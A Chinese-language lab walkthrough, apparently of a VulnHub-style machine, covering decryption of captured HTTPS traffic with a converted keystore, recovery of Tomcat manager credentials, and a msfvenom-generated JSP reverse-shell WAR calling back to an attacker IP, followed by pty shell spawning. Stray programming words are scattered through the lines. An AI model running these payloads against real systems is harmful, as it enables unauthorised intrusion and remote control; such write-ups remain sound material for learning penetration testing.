1、瀏覽器訪問192.168.110.140java
2、點擊圖片,進入後臺
3、點擊Employee portal進入登陸後臺
python
4、發現須要登陸密碼,接下來就是得到密碼
按F12打開開發者模式,發現旁註裏有解密後的用戶和密碼,用base64解碼,獲得用戶和密碼
5、登陸進去以後,咱們開始進行信息收集,咱們發現了兩條有用的信息nginx
經過這個網址,咱們下載下來了一個證書,生成的密鑰文件 由於他是一個瀏覽器的認證因此解不開
shell
經過這個網址咱們獲得了一個pcap流量包,截取***的流量包 我是在百度開始搜索nginx生成ssl證書 下面會介紹瀏覽器
6、咱們來分析該流量,咱們將流量包放在wireshark上,發現由於是https協議,因此都是密文的,咱們沒法獲得什麼信息tomcat
7、因此咱們得想辦法將其變成明文的,方便咱們收集信息,這就是咱們接下來的任務,咱們首先知道剛纔下載了一個keystore的證書,咱們試着將這個證書導到wireshark中,看看可不能夠,嘗試事後發現不能夠,流量仍是密文的,後來咱們知道應該講證書轉化成p12格式才能夠被解析,那接下來咱們來操做這步bash
首先咱們把keystore傳到moba上,而後在kali上敲jsp
keytool -importkeystore -srckeystore /root/keystore -destkeystore /root/nima.p12 -deststoretype PKCS12 -srcalias tomcat
獲得了一個nima.p12的證書,接下來咱們將這個證書導到wireshark上tcp
8443多是https協議因此設值爲他ide
(這一步得打個註釋:我這裏選的是TLS,由於是老版,新版的話直接選SSL就能夠了) 解完包會變成http格式
(這裏也得強調一下,這裏這個IP地址寫的不是目的地址,而是本身的主機IP,協議要寫http,而不是https)
8、最後點擊ok就導入完成了,這時咱們發現流量多了http的流量,咱們去追它http流,發現是明文的了,401表明登錄失敗 能夠判斷出穿的***
9、那咱們如今能夠開始收集信息了,咱們在上面看到401,須要登陸,往下翻發現有200狀態碼,說明登陸成功了,那咱們往上看,確定有帳號密碼,而後咱們發現了被加密過了的帳號和密碼,咱們將其複製去解碼器中解碼,獲得了帳號和密碼 tomcat:Tt\5D8F(#!*u=G)4m7zB
10、接下來咱們去找這個須要登陸的tomcat的頁面,咱們去分析它的流量找到了這個網址
發現從192.168.110.129到192.168.110.140的***流量包,其中有cmd命令馬執行了id命令,***者上傳了兩張圖片,疑似圖片馬,可是命令馬沒法直接訪問,須要登陸tomcat後臺:
11、接下來咱們去瀏覽器訪問該網址,發現沒法訪問,由於咱們沒有相應的證書,它有限制,咱們新版的瀏覽器都不容許訪問
但咱們知道burp上也有各類證書,因此咱們掛上代理,用burp代理放包,達到訪問的目的
放包以後發現出現了登陸框,咱們輸入上面獲得的帳號和密碼
放包,發現了tomcat的頁面
咱們向上面傳***,用msf生成***
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.189 lport=8989 -f war -o shandian.war
爲了避免用一次次的放包,咱們如今直接設置成不攔截
而後訪問***,這邊kali上監聽
最後獲得權限
咱們可使用 python -c 'import pty;pty.spawn("/bin/bash")' 使其有bash模式
還可使用 id 看咱們當前的權限 爲tomcat6(普通用戶權限)